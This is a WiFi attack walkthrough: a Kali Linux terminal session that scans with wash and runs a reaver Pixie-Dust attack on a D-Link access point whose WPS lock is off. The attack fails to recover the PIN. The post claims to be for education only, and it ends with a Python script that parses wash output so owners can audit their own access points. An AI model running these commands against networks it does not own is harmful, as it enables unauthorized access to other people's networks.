Cracking WiFi (WPS config) in Kali Linux

We want to examine the security of a WPS modem configuration. This video is for education only; please do not use it in any illegal, wrong or harmful way. You alone are responsible for any illegal use of this material.


root@kali:~/Desktop# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 10:1f:74:e2:c8:ba  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 12  bytes 720 (720.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12  bytes 720 (720.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether d0:df:9a:95:6a:6f  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@kali:~/Desktop# airmon-ng check kill

Killing these processes:

  PID Name
 1925 wpa_supplicant

root@kali:~/Desktop# airmon-ng check


root@kali:~/Desktop# airmon start wlan0
bash: airmon: command not found
root@kali:~/Desktop# airmon-ng  start wlan0


PHY    Interface    Driver        Chipset

phy0    wlan0        ath9k        Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~/Desktop# wash -i
wash: option requires an argument -- 'i'
Required Arguments:
    -i, --interface=<iface>              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=<num>                  Channel to listen on [auto]
    -o, --out-file=<file>                Write data to file
    -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                      Daemonize wash
    -C, --ignore-fcs                     Ignore frame checksum errors
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -P, --output-piped                   Allows Wash output to be piped. Example. wash x|y|z...
    -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
    -h, --help                           Show help

Example:
    wash -i mon0

root@kali:~/Desktop# wash -i wlan0

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[X] ERROR: Failed to open 'wlan0' for capturing
root@kali:~/Desktop# wash -i wlan0mon

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
—————————————————————————————————————
90:8D:78:1D:6E:13       8            31        1.0               No                D-LinkSP
^C
root@kali:~/Desktop# reaver

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
    -Z, --no-auto-pass              Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]
    -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
    -1, --p1-index                  Set initial array index for the first half of the pin [False]
    -2, --p2-index                  Set initial array index for the second half of the pin [False]
    -P, --pixiedust-loop            Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
    -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

Example:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1

root@kali:~/Desktop# reaver -i wlan0mon -b 90:8D:78:1D:6E:13   -vv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 90:8D:78:1D:6E:13
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 8
[+] Associated with 90:8D:78:1D:6E:13 (ESSID: D-LinkSP)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5f:dd:63:de:3f:c7:b4:fd:50:3b:6e:c1:6d:e4:6a:0d
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: 48:58:1e:f1:bf:f6:a0:80:e4:ec:c8:7c:b1:2d:a0:cf
[P] PKR: 69:21:04:34:4f:a3:93:5e:d2:c9:d0:41:5b:2e:9d:83:02:46:64:4c:95:43:15:a1:eb:d2:fa:58:53:81:13:66:3d:fb:4f:57:99:ad:08:a9:d7:37:3b:66:c4:f5:50:90:8a:64:da:d9:3c:b5:e9:1d:64:ed:8a:0c:94:25:ea:78:c3:10:9f:c6:07:ec:12:ba:27:7b:6c:b7:55:93:d7:59:e0:26:79:06:50:6b:59:1a:b5:27:f7:2e:30:68:39:3a:e8:99:e9:ee:f9:88:e6:5d:d3:41:63:d5:01:cb:4c:9d:85:b1:c2:06:c5:a1:8d:76:c3:1c:4f:e4:e5:18:98:d2:a5:ec:15:cf:54:36:4b:98:db:cf:ba:17:ad:ea:b3:08:66:c1:37:93:5c:6c:09:fd:29:5f:27:9e:32:11:45:9e:e1:48:59:41:e2:47:9b:88:1b:31:58:67:a1:c2:31:87:00:53:b0:66:89:16:a5:11:82:89:54:5c:41:3a:ae:f1
[P] AuthKey: 67:d1:85:46:e3:e4:71:2c:60:16:60:d3:5a:75:29:87:9b:2b:6f:c5:11:ce:9f:f3:53:14:a9:f5:1e:1e:50:23
[+] Sending M2 message
[P] E-Hash1: cd:85:41:ce:7f:af:b6:b7:28:e7:e4:96:4a:89:b8:4d:93:bf:28:ce:17:a0:40:2d:7e:05:a0:71:f0:8b:c8:bd
[P] E-Hash2: 5c:b7:b7:70:86:b1:18:08:11:8a:2d:5b:71:22:65:1e:c0:44:fa:eb:cb:d6:63:54:cb:99:1b:e9:ce:4d:e2:07
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 496 ms
[Pixie-Dust]  
[Pixie-Dust]   [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]  
root@kali:~/Desktop#
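The wash survey above is also what a network owner would use to audit their own access points for WPS that was left enabled and unlocked, which is the condition the session above relies on. The following is an added example (not part of the original post or of the wash/reaver tools) that parses wash survey output and reports the APs still exposing WPS; the D-LinkSP row is taken from the session above, the other rows and BSSIDs are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Iterable

# Constructed sample of wash survey output. The first row is the D-LinkSP
# entry from the session above; the remaining rows are made up.
SAMPLE_WASH_OUTPUT = """\
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------
90:8D:78:1D:6E:13       8            31        1.0               No                D-LinkSP
AA:BB:CC:00:11:22       6            55        2.0               Yes               Office-Guest
AA:BB:CC:00:11:33      11            40        2.0               No                Lab AP 2
^C
"""

# One wash survey row: BSSID, channel, RSSI, WPS version, lock flag, ESSID (may contain spaces).
ROW_RE = re.compile(
    r"^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+(\d+)\s+(-?\d+)\s+(\S+)\s+(Yes|No)\s+(.*)$"
)


@dataclass
class WpsAp:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str


def parse_wash(text: str) -> List[WpsAp]:
    """Parse wash survey output, skipping the header, separator and ^C lines."""
    aps = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        bssid, ch, rssi, ver, locked, essid = m.groups()
        aps.append(WpsAp(bssid.upper(), int(ch), int(rssi), ver, locked == "Yes", essid.strip()))
    return aps


def exposed_aps(aps: Iterable[WpsAp], owned_bssids: Optional[Iterable[str]] = None) -> List[WpsAp]:
    """APs advertising WPS with the lock not engaged; optionally limited to an allowlist
    of BSSIDs the auditor owns, so only the auditor's own devices are reported."""
    hits = [ap for ap in aps if not ap.locked]
    if owned_bssids is not None:
        owned = {b.upper() for b in owned_bssids}
        hits = [ap for ap in hits if ap.bssid in owned]
    return hits
```

Feed it `wash -i wlan0mon -o survey.txt` output from your own network and disable WPS (or confirm the lock) on every AP it reports.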

